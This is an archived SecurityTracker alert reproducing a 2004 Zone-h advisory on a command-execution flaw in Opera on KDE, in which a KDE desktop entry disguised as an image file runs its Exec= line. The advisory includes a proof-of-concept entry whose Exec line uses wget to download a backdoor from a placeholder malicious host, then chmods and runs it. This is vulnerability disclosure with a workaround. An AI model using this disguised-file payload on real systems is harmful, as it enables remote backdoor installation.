SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Opera Vendors:   Opera Software
Opera Default 'kfmclient exec' Configuration May Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1012491
SecurityTracker URL:  http://securitytracker.com/id/1012491
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 13 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): Tested on Opera 7.54 on Linux with KDE 3.2.3
Description:   A vulnerability was reported in Opera when using KDE. A remote user may be able to cause the target user to execute arbitrary commands.

Giovanni Delvecchio of Zone-h reported that KDE uses 'kfmclient exec' as the default application for processing saved files. A remote user can cause arbitrary shell commands to be executed on the target system.

For example, a remote server can supply 'image.Jpg' with an unknown Content-Type field, causing Opera to display a dialog box for the file. If the target user selects 'Open' to view the supposed image file, the file will be opened using 'kfmclient exec'. If 'image.Jpg' is a KDE desktop entry, then the target user's system will execute the command in the 'Exec' entry.

The original advisory is available at:

http://www.zone-h.org/advisories/read/id=6503

Impact:   A remote user may be able to cause arbitrary commands to be executed on the target user's system with some user interaction.
Solution:   No vendor solution was available at the time of this entry.

The report indicates that as a workaround, you can disable 'kfmclient exec' as the default application.

Vendor URL:  www.opera.com/ (Links to External Site)
Cause:   Configuration error, Input validation error, State error
Underlying OS:  Linux (Any)

Message History:   None.


 Source Message Contents

Subject:  [ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclien


Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org

Original Advisory: http://www.zone-h.org/advisories/read/id=6503

Tested version:
Opera 7.54 linux version with Kde 3.2.3



Problem:
=======
Opera for linux uses "kfmclient exec" as "Default Application" to handle
saved files.
This could be used by malicious remote users to execute arbitrary shell
commands on a target system.
Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop 
Entry" and therefore execute the command within the "Exec=" entry.

Example of [KDE Desktop Entry]:

________________________________

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________


Possible method of Exploitation
=========================

This method of exploitation needs that a particular file name extension
is used.
If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , 
the command in "Exec=" entry will be executed.
Instead, If "page.htm" is used as file name, it will not be opened like a 
"kde desktop entry" but it will be viewed in konqueror.
It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since
the "system" is case sensitive.

Attack scenario:

1- A user clicks on a link which requires http://malicious_server/image.Jpg

2- malicious_server responds with an unknown Content-Type field , for
example Content-Type: image/Jpeg. (note the dot at the end), so Opera will 
show a dialog window.

3- if a user chooses "Open" to view image.Jpg, it will be opened by
"kfmclient exec" command, since kfmclient is the "Default Application"

4- Image.Jpg is a kde desktop entry :

--------image.Jpg----------

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c 
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------

Note: \t is an horizontal tab.
In this case a backdoor will be downloaded on victim's computer and 
executed.



Solution:
========
Disable "kfmclient exec" as default application

_________________________________________________________________
Filtri antispamming e antivirus per la tua casella di posta 
http://www.msn.it/msn/hotmail

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC